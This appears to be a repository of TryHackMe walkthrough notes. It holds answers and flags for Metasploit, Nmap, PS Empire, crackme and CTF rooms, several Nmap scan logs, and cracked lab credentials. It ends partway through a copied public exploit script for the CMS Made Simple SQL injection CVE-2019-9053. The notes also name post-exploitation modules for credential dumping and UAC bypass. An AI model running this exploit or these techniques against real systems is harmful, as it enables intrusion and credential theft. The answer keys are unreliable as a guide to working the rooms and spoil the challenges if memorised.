https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/sql-service-password.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Try Hack Me | https://tryhackme.com/p/mr.sage 2 | 3 | 4 | -------------------------------------------------------------------------------- /RP Metasploit/README.md: -------------------------------------------------------------------------------- 1 | # RP : Metasploit | https://tryhackme.com/room/rpmetasploit 2 | 3 | ### [Task 2] Initializing... 4 | 5 | #3 We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the '-' : `-q` 6 | 7 | #6 Cool! We've connected to the database, which type of database does Metasploit 5 use? : `postgresql` 8 | 9 | ### [Task 3] Rock 'em to the Core [Commands] 10 | 11 | #2 The help menu has a very short one-character alias, what is it? : `?` 12 | 13 | #3 Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching? : `search` 14 | 15 | #4 Once we've found the module we want to leverage, what command we use to select it as the active module? : `use` 16 | 17 | #5 How about if we want to view information about either a specific module or just the active one we have selected? : `info` 18 | 19 | #6 Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can 'talk' to it. What command is this? : `connect` 20 | 21 | #7 Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)? : `banner` 22 | 23 | #8 We'll revisit these next two commands shortly, however, they're two of the most used commands within Metasploit. First, what command do we use to change the value of a variable? : `set` 24 | 25 | #9 Metasploit supports the use of global variables, something which is incredibly useful when you're specifically focusing on a single box. What command changes the value of a variable globally? : `setg` 26 | 27 | #10 Now that we've learned about to change the value of variables, how do we view them? There are technically several answers to this question, however, I'm looking for a specific three-letter command which is used to view the value of single variables. : `get` 28 | 29 | #11 How about changing the value of a variable to null/no value? : `unset` 30 | 31 | #12 When performing a penetration test it's quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file? : `spool` 32 | 33 | #13 Leaving a Metasploit console running isn't always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file. : `save` 34 | 35 | ### [Task 4] Modules for Every Occasion! 36 | 37 | #1 Easily the most common module utilized, which module holds all of the exploit code we will use? : `exploit` 38 | 39 | #2 Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation? : `payload` 40 | 41 | #3 Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course. : `auxiliary` 42 | 43 | #4 One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities? : `post` 44 | 45 | #5 Commonly utilized in payload obfuscation, which module allows us to modify the 'appearance' of our exploit such that we may avoid signature detection? : `encoder` 46 | 47 | #6 Last but not least, which module is used with buffer overflow and ROP attacks? : `nop` 48 | 49 | #7 Not every module is loaded in by default, what command can we use to load different modules? : `load` 50 | 51 | ### [Task 5] Move that shell! 52 | 53 | #2 What service does nmap identify running on port 135? : `msrpc` 54 | 55 | #6 Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type 'use' followed by a unique string found within only the target exploit. For example, try this out now with the following command 'use icecast'. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start : `exploit/windows/http/icecast_header` 56 | 57 | #7 While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command 'search multi/handler'. What is the name of the column on the far left side of the console that shows up next to 'Name'? Go ahead and run the command use NUMBER_NEXT_TO exploit/multi/handler wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use. : `#` 58 | 59 | ### [Task 6] We're in, now what? 60 | 61 | #1 First things first, our initial shell/process typically isn't very stable. Let's go ahead and attempt to move to a different process. First, let's list the processes using the command 'ps'. What's the name of the spool service? : `spoolsv.exe` 62 | 63 | #2 Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try! : `migrate` 64 | 65 | #3 Well that migration didn't work, let's find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in? : `getuid` 66 | 67 | #4 How about finding more information out about the system itself? : `sysinfo` 68 | 69 | #5 This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it? : `load kiwi` 70 | 71 | #6 Let's go ahead and figure out the privileges of our current user, what command do we run? : `getprivs` 72 | 73 | #7 What command do we run to transfer files to our victim computer? : `upload` 74 | 75 | #8 How about if we want to run a Metasploit module? : `run` 76 | 77 | #9 A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim? : `ipconfig` 78 | 79 | #13 One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell? : `shell` 80 | 81 | ### [Task 7] Makin' Cisco Proud 82 | 83 | #1 Let's go ahead and run the command `run autoroute -h`, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer. : `run autoroute -s 172.18.1.0 -n 255.255.255.0` 84 | 85 | #2 Additionally, we can start a socks4a proxy server out of this session. Background our current meterpreter session and run the command `search server/socks4a`. What is the full path to the socks4a auxiliary module? : `auxiliary/server/socks4a` 86 | 87 | #3 Once we've started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks4a server with proxychains? : `proxychains` 88 | -------------------------------------------------------------------------------- /RP Nmap/README.md: -------------------------------------------------------------------------------- 1 | # Nmap | https://tryhackme.com/room/rpnmap 2 | 3 | ### [Task 2] Nmap Quiz 4 | 5 | #1 First, how do you access the help menu? : `-h` 6 | 7 | #2 Often referred to as a stealth scan, what is the first switch listed for a 'Syn Scan'? : `-sS` 8 | 9 | #3 Not quite as useful but how about a 'UDP Scan'? : `-sU` 10 | 11 | #4 What about operating system detection? : `-O` 12 | 13 | #5 How about service version detection? : `-sV` 14 | 15 | #6 Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag? : `-v` 16 | 17 | #7 What about 'very verbose'? (A personal favorite) : `-vv` 18 | 19 | #8 Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format? : `-oX` 20 | 21 | #9 Aggressive scans can be nice when other scans just aren't getting the output that you want and you really don't care how 'loud' you are, what is the switch for enabling this? : `-A` 22 | 23 | #10 How do I set the timing to the max level, sometimes called 'Insane'? : `-T5` 24 | 25 | #11 What about if I want to scan a specific port? : `-p` 26 | 27 | #12 How about if I want to scan every port? : `-p-` 28 | 29 | #13 What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run. : `--script` 30 | 31 | #14 What if I want to run all scripts out of the vulnerability category? : `--script vuln` 32 | 33 | #15 What switch should I include if I don't want to ping the host? : `-Pn` 34 | 35 | ### [Task 3] Nmap Scanning 36 | 37 | #1 Let's go ahead and start with the basics and perform a syn scan on the box provided. What will this command be without the host IP address? : `nmap -sS` 38 | 39 | #2 After scanning this, how many ports do we find open under 1000? : `2` 40 | 41 | #3 What communication protocol is given for these ports following the port number? : `tcp` 42 | 43 | #4 Perform a service version detection scan, what is the version of the software running on port 22? : `6.6.1p1` 44 | 45 | #5 Perform an aggressive scan, what flag isn't set under the results for port 80? : `httponly` 46 | 47 | #6 Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. : `http-slowloris-check` -------------------------------------------------------------------------------- /RP Nmap/nmap --script vuln 10.10.34.127.txt: -------------------------------------------------------------------------------- 1 | nmap --script vuln 10.10.34.127 2 | 3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:40 IST 4 | Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan 5 | Nmap scan report for 10.10.34.127 6 | Host is up (0.23s latency). 7 | Not shown: 998 closed ports 8 | PORT STATE SERVICE 9 | 22/tcp open ssh 10 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 11 | 80/tcp open http 12 | |clamav-exec: ERROR: Script execution failed (use -d to debug) 13 | | http-cookie-flags: 14 | | /: 15 | | PHPSESSID: 16 | | httponly flag not set 17 | | /login.php: 18 | | PHPSESSID: 19 | | httponly flag not set 20 | |_http-csrf: Couldn't find any CSRF vulnerabilities. 21 | |http-dombased-xss: Couldn't find any DOM based XSS. 22 | | http-enum: 23 | | /login.php: Possible admin folder 24 | | /robots.txt: Robots file 25 | | /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 26 | | /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 27 | | /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 28 | | http-slowloris-check: 29 | | VULNERABLE: 30 | | Slowloris DOS attack 31 | | State: LIKELY VULNERABLE 32 | | IDs: CVE:CVE-2007-6750 33 | | Slowloris tries to keep many connections to the target web server open and hold 34 | | them open as long as possible. It accomplishes this by opening connections to 35 | | the target web server and sending a partial request. By doing so, it starves 36 | | the http server's resources causing Denial Of Service. 37 | | 38 | | Disclosure date: 2009-09-17 39 | | References: 40 | | http://ha.ckers.org/slowloris/ 41 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 42 | |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. -------------------------------------------------------------------------------- /RP Nmap/nmap -A 10.10.34.127.txt: -------------------------------------------------------------------------------- 1 | nmap -A 10.10.34.127 2 | 3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:38 IST 4 | Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute 5 | Traceroute Timing: About 32.26% done; ETC: 13:38 (0:00:00 remaining) 6 | Nmap scan report for 10.10.34.127 7 | Host is up (0.22s latency). 8 | Not shown: 998 closed ports 9 | PORT STATE SERVICE VERSION 10 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) 11 | | ssh-hostkey: 12 | | 1024 b8:6c:15:90:70:1f:8d:c6:1d:1c:ff:6f:80:f4:ad:db (DSA) 13 | | 2048 7d:b7:f7:42:15:d1:98:c2:38:55:84:14:58:4f:c8:1a (RSA) 14 | | 256 4d:3d:eb:49:9e:15:e6:d3:9a:41:ea:0d:68:d8:7d:d3 (ECDSA) 15 | |_ 256 08:ae:1f:5d:2e:6e:9d:8f:4c:2e:a4:bb:be:fe:9d:82 (ED25519) 16 | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 17 | | http-cookie-flags: 18 | | /: 19 | | PHPSESSID: 20 | | httponly flag not set 21 | | http-robots.txt: 1 disallowed entry 22 | |/ 23 | |_http-server-header: Apache/2.4.7 (Ubuntu) 24 | | http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop... 25 | |_Requested resource was login.php 26 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 27 | TCP/IP fingerprint: 28 | OS:SCAN(V=7.80%E=4%D=3/21%OT=22%CT=1%CU=44727%PV=Y%DS=2%DC=T%G=Y%TM=5E75CB9 29 | OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS 30 | OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1 31 | OS:1NW6%O6=M54DST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN 32 | OS:(R=Y%DF=Y%T=40%W=6903%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A 33 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R 34 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F 35 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% 36 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD 37 | OS:=S) 38 | Network Distance: 2 hops 39 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 40 | 41 | TRACEROUTE (using port 995/tcp) 42 | HOP RTT ADDRESS 43 | 1 224.00 ms 10.9.0.1 44 | 2 224.06 ms 10.10.34.127 -------------------------------------------------------------------------------- /RP Nmap/nmap -sS 10.10.34.127 .txt: -------------------------------------------------------------------------------- 1 | nmap -sS 10.10.34.127 2 | 3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:36 IST 4 | Nmap scan report for 10.10.34.127 5 | Host is up (0.24s latency). 6 | Not shown: 998 closed ports 7 | PORT STATE SERVICE 8 | 22/tcp open ssh 9 | 80/tcp open http -------------------------------------------------------------------------------- /RP Nmap/nmap -sV -p 22 10.10.34.127.txt: -------------------------------------------------------------------------------- 1 | nmap -sV -p 22 10.10.34.127 2 | 3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:37 IST 4 | Nmap scan report for 10.10.34.127 5 | Host is up (0.22s latency). 6 | 7 | PORT STATE SERVICE VERSION 8 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) 9 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel -------------------------------------------------------------------------------- /RP PS-Empire/PowerShell Empire.txt: -------------------------------------------------------------------------------- 1 | https://github.com/BC-SECURITY/Empire/ -------------------------------------------------------------------------------- /RP PS-Empire/README.md: -------------------------------------------------------------------------------- 1 | # RP: PS Empire | https://tryhackme.com/room/rppsempire 2 | 3 | ### [Task 3] Listeners 4 | 5 | #1 Once empire has launched, type help to view the various menus. Which menu to we launch to access listeners? : `listeners` 6 | 7 | #3 What command can we now type to view all of the options related to our selected listener type? : `info` 8 | 9 | #4 Once the information regarding the listener pops up, peruse this for some of the more interesting options we can set in order to disguise our actions more. Which option can we use to set specific times when our listener will be active? : `WorkingHours` 10 | 11 | #5 Similar to changing/spoofing what browser you are using on the internet, what option can we set to appear as a different user agent (i.e. chrome, firefox, etc)? : `DefaultProfile` 12 | 13 | #6 What option can we use to set the port which the listener will bind to? : `port` 14 | 15 | #7 In addition to changing our browser profile, we can change what our server appears as. What option can we set to change this? : `ServerVersion` 16 | 17 | #8 Launch our newly created listener on port 80 with the command 'execute'. What message is displayed following successfully launching the listener? : `Listener successfully started!` 18 | 19 | #9 We can verify that our listener is now active by typing what command? : `listeners` 20 | 21 | ### [Task 4] Stagers 22 | 23 | #1 First, type the command 'usestager' and double-tap tab to view all options we have for stagers. Which option allows us to use a batch file? : `windows/launcher_bat` 24 | 25 | #2 Let's finish our previous command and select the batch file option. Press enter to finalize this. What is our new path to the 'module' we have selected? : `stager/windows/launcher_bat` 26 | 27 | #3 Since we've previously set our listener to use http, we must now set the associated options within our stager we are building to match that. What option must we set in order to accomplish this? : `Listener` 28 | 29 | #4 Type execute to finish creating our stager. Where is the stager saved? : `/tmp/launcher.bat` 30 | 31 | ### [Task 5] Agents and Post-Exploitation 32 | 33 | #3 What command do we use to interact with an agent? : `interact` 34 | 35 | #4 What about if we wanted to list any usernames and passwords we have gathered? : `creds` 36 | 37 | #5 And if we wanted to 'deactivate' an agent for a while to avoid detection? : `sleep` 38 | 39 | #6 How about if we wanted to delete an agent or disconnect it? : `kill` 40 | 41 | #7 Moving into the post exploitation modules, what command can we use to search through these? : `searchmodule` 42 | 43 | #8 We'll start with the most important module, find the module which plays a specific AC/DC song. : `python/trollsploit/osx/thunderstruck` 44 | 45 | #9 What if we wanted to perform an lsa dump with a certain popular windows credential gathering tool? : `powershell/credentials/mimikatz/lsadump` 46 | 47 | #10 Sometime we might not have the permissions level that we require to perform further actions, what module set might we have to use to get around UAC? : `bypassuac` 48 | 49 | #11 What module family allows us to gather additional information about the network we are on? : `recon` 50 | 51 | #12 Our process we have compromised might not be the most stable, how do we migrate to another process? (This will have a specific module answer) : `powershell/management/psinject` 52 | 53 | #13 Last but not least, what module can we use to turn on remote desktop access for our purposes? : `powershell/management/enable_rdp` 54 | -------------------------------------------------------------------------------- /RP PS-Empire/exploit.txt: -------------------------------------------------------------------------------- 1 | ms17_010_eternalblue -------------------------------------------------------------------------------- /RP PS-Empire/nmap_vuln.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Fri May 29 01:17:59 2020 as: nmap --script vuln -oN nmap_vuln.nmap 10.10.64.241 2 | Pre-scan script results: 3 | | broadcast-avahi-dos: 4 | | Discovered hosts: 5 | | 224.0.0.251 6 | | After NULL UDP avahi packet DoS (CVE-2011-1002). 7 | |_ Hosts are all up (not vulnerable). 8 | Nmap scan report for 10.10.64.241 9 | Host is up (0.22s latency). 10 | Not shown: 991 closed ports 11 | PORT STATE SERVICE 12 | 135/tcp open msrpc 13 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 14 | 139/tcp open netbios-ssn 15 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 16 | 445/tcp open microsoft-ds 17 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 18 | 3389/tcp open ms-wbt-server 19 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 20 | |_sslv2-drown: 21 | 49152/tcp open unknown 22 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 23 | 49153/tcp open unknown 24 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 25 | 49154/tcp open unknown 26 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 27 | 49158/tcp open unknown 28 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 29 | 49160/tcp open unknown 30 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 31 | 32 | Host script results: 33 | |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED 34 | |_smb-vuln-ms10-054: false 35 | |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED 36 | | smb-vuln-ms17-010: 37 | | VULNERABLE: 38 | | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 39 | | State: VULNERABLE 40 | | IDs: CVE:CVE-2017-0143 41 | | Risk factor: HIGH 42 | | A critical remote code execution vulnerability exists in Microsoft SMBv1 43 | | servers (ms17-010). 44 | | 45 | | Disclosure date: 2017-03-14 46 | | References: 47 | | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 48 | | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 49 | |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ 50 | 51 | # Nmap done at Fri May 29 01:20:06 2020 -- 1 IP address (1 host up) scanned in 127.00 seconds 52 | -------------------------------------------------------------------------------- /Retro/CVE-2017-0213_x64.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Retro/CVE-2017-0213_x64.tar.xz -------------------------------------------------------------------------------- /Retro/README.md: -------------------------------------------------------------------------------- 1 | # Retro | https://tryhackme.com/room/retro 2 | 3 | ### [Task 1] Pwn 4 | 5 | #1 What is the hidden directory which the website lives on? ```: /retro``` 6 | 7 | #2 user.txt : ```3b99fbdc6d430bfb51c72c651a261927``` 8 | 9 | #3 root.txt : ```7958b569565d7bd88d10c6f22d1c4063``` -------------------------------------------------------------------------------- /Reversing ELF/README.md: -------------------------------------------------------------------------------- 1 | # Reversing ELF | https://tryhackme.com/room/reverselfiles 2 | 3 | ### [Task 1] Crackme1 4 | 5 | Let's start with a basic warmup, can you run the binary? 6 | 7 | #1 What is the flag? : ```flag{not_that_kind_of_elf}``` 8 | 9 | ### [Task 2] Crackme2 10 | 11 | Find the super-secret password! and use it to obtain the flag 12 | 13 | #1 What is the super secret password ? : ```super_secret_password``` 14 | 15 | #2 What is the flag ? : ```flag{if_i_submit_this_flag_then_i_will_get_points}``` 16 | 17 | ### [Task 3] Crackme3 18 | 19 | Use basic reverse engineering skills to obtain the flag 20 | 21 | #1 What is the flag? : ```f0r_y0ur_5ec0nd_le55on_unbase64_4ll_7h3_7h1ng5``` 22 | 23 | ### [Task 4] Crackme4 24 | 25 | Analyze and find the password for the binary? 26 | 27 | #1 What is the password ? : ```my_m0re_secur3_pwd``` 28 | 29 | ### [Task 5] Crackme5 30 | 31 | What will be the input of the file to get output Good game ? 32 | 33 | #1 What is the input ? : ```OfdlDSA|3tXb32~X3tX@sX`4tXtz``` 34 | 35 | ### [Task 6] Crackme6 36 | 37 | Analyze the binary for the easy password 38 | 39 | #1 What is the password ? : ```1337_pwd``` 40 | 41 | ### [Task 7] Crackme7 42 | 43 | Analyze the binary to get the flag 44 | 45 | #1 What is the flag ? : ```flag{much_reversing_very_ida_wow}``` 46 | 47 | ### [Task 8] Crackme8 48 | 49 | Analyze the binary and obtain the flag 50 | 51 | #1 What is the flag ? : ```flag{at_least_this_cafe_wont_leak_your_credit_card_numbers}``` 52 | -------------------------------------------------------------------------------- /Reversing ELF/crackme1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme1 -------------------------------------------------------------------------------- /Reversing ELF/crackme2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme2 -------------------------------------------------------------------------------- /Reversing ELF/crackme3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme3 -------------------------------------------------------------------------------- /Reversing ELF/crackme4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme4 -------------------------------------------------------------------------------- /Reversing ELF/crackme5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme5 -------------------------------------------------------------------------------- /Reversing ELF/crackme6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme6 -------------------------------------------------------------------------------- /Reversing ELF/crackme7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme7 -------------------------------------------------------------------------------- /Reversing ELF/crackme8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme8 -------------------------------------------------------------------------------- /Shodan.io/README.md: -------------------------------------------------------------------------------- 1 | # Shodan.io | https://tryhackme.com/room/shodan 2 | 3 | ### [Task 2] Getting Started 4 | 5 | #1 What is Google's ASN number? : `AS15169` 6 | 7 | #2 When was it allocated? Give the year only. : `2000` 8 | 9 | #3 Where are most of the machines on this ASN number, physically in the world? : `United States` 10 | 11 | #4 What is Google's top service across all their devices on this ASN? : `SSH` 12 | 13 | #5 What SSH product does Google use? : `OpenSSH` 14 | 15 | #6 What is Google's most used Google product, according to this search? Ignore the word "Google" in front of it. : `Cloud` 16 | 17 | ### [Task 4] Google & Filtering 18 | 19 | #1 What is the top operating system for MYSQL servers in Google's ASN? : `Linux 3.x` 20 | 21 | #2 What is the 3rd most popular country for MYSQL servers in Google's ASN? : `EU` 22 | 23 | #3 Under Google's ASN, which is more popular for nginx, Hypertext Transfer Protocol or Hypertext Transfer Protocol(s)? : `Hypertext Transfer Protocol` 24 | 25 | #4 Under Google's ASN, what is the most popular city? : `Mountain View` 26 | 27 | #5 Under Google's ASN in Oakland, what is the top operating system according to Shodan? : `Windows Server 2012` 28 | 29 | #6 Using the top Webcam search from the explore page, does Google's ASN have any webcams? (Yay/Nay) : `Nay` 30 | -------------------------------------------------------------------------------- /Simple CTF/CVE.txt: -------------------------------------------------------------------------------- 1 | CMS Made Simple < 2.2.10 - SQL Injection 2 | 3 | CVE: 2019-9053 4 | 5 | https://www.exploit-db.com/exploits/46635 -------------------------------------------------------------------------------- /Simple CTF/README.md: -------------------------------------------------------------------------------- 1 | Simple CTF | https://tryhackme.com/room/easyctf 2 | 3 | ### [Task 1] Simple CTF 4 | 5 | Deploy the machine and attempt the questions! 6 | 7 | #1 How many services are running under port 1000? : `2` 8 | 9 | #2 What is running on the higher port? : `ssh` 10 | 11 | #3 What's the CVE you're using against the application? : `CVE-2019-9053` 12 | 13 | #4 To what kind of vulnerability is the application vulnerable? `sqli` 14 | 15 | #5 What's the password? : `secret` 16 | 17 | #6 Where can you login with the details obtained? : `ssh` 18 | 19 | #7 What's the user flag? : `G00d j0b, keep up!` 20 | 21 | #8 Is there any other user in the home directory? What's its name? : `sunbath` 22 | 23 | #9 What can you leverage to spawn a privileged shell? : `vim` 24 | 25 | #10 What's the root flag? : `W3ll d0n3. You made it!` 26 | -------------------------------------------------------------------------------- /Simple CTF/creds.txt: -------------------------------------------------------------------------------- 1 | [+] Salt for password found : 1dac0d92e9fa6bb2 2 | [+] Username found : mitch 3 | [+] Email found : admin@admin.com 4 | [+] Password found : 0c01f4468bd75d7a84c7eb73846e8d96 5 | [+] Password cracked : secret 6 | -------------------------------------------------------------------------------- /Simple CTF/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 3 | # Date: 30-03-2019 4 | # Exploit Author: Daniele Scanu @ Certimeter Group 5 | # Vendor Homepage: https://www.cmsmadesimple.org/ 6 | # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ 7 | # Version: <= 2.2.9 8 | # Tested on: Ubuntu 18.04 LTS 9 | # CVE : CVE-2019-9053 10 | 11 | import requests 12 | from termcolor import colored 13 | import time 14 | from termcolor import cprint 15 | import optparse 16 | import hashlib 17 | 18 | parser = optparse.OptionParser() 19 | parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)") 20 | parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") 21 | parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False) 22 | 23 | options, args = parser.parse_args() 24 | if not options.url: 25 | print "[+] Specify an url target" 26 | print "[+] Example usage (no cracking password): exploit.py -u http://target-uri" 27 | print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist" 28 | print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based." 29 | exit() 30 | 31 | url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' 32 | session = requests.Session() 33 | dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' 34 | flag = True 35 | password = "" 36 | temp_password = "" 37 | TIME = 1 38 | db_name = "" 39 | output = "" 40 | email = "" 41 | 42 | salt = '' 43 | wordlist = "" 44 | if options.wordlist: 45 | wordlist += options.wordlist 46 | 47 | def crack_password(): 48 | global password 49 | global output 50 | global wordlist 51 | global salt 52 | dict = open(wordlist) 53 | for line in dict.readlines(): 54 | line = line.replace("\n", "") 55 | beautify_print_try(line) 56 | if hashlib.md5(str(salt) + line).hexdigest() == password: 57 | output += "\n[+] Password cracked: " + line 58 | break 59 | dict.close() 60 | 61 | def beautify_print_try(value): 62 | global output 63 | print "\033c" 64 | cprint(output,'green', attrs=['bold']) 65 | cprint('[*] Try: ' + value, 'red', attrs=['bold']) 66 | 67 | def beautify_print(): 68 | global output 69 | print "\033c" 70 | cprint(output,'green', attrs=['bold']) 71 | 72 | def dump_salt(): 73 | global flag 74 | global salt 75 | global output 76 | ord_salt = "" 77 | ord_salt_temp = "" 78 | while flag: 79 | flag = False 80 | for i in range(0, len(dictionary)): 81 | temp_salt = salt + dictionary[i] 82 | ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] 83 | beautify_print_try(temp_salt) 84 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+" 85 | url = url_vuln + "&m1_idlist=" + payload 86 | start_time = time.time() 87 | r = session.get(url) 88 | elapsed_time = time.time() - start_time 89 | if elapsed_time >= TIME: 90 | flag = True 91 | break 92 | if flag: 93 | salt = temp_salt 94 | ord_salt = ord_salt_temp 95 | flag = True 96 | output += '\n[+] Salt for password found: ' + salt 97 | 98 | def dump_password(): 99 | global flag 100 | global password 101 | global output 102 | ord_password = "" 103 | ord_password_temp = "" 104 | while flag: 105 | flag = False 106 | for i in range(0, len(dictionary)): 107 | temp_password = password + dictionary[i] 108 | ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:] 109 | beautify_print_try(temp_password) 110 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + 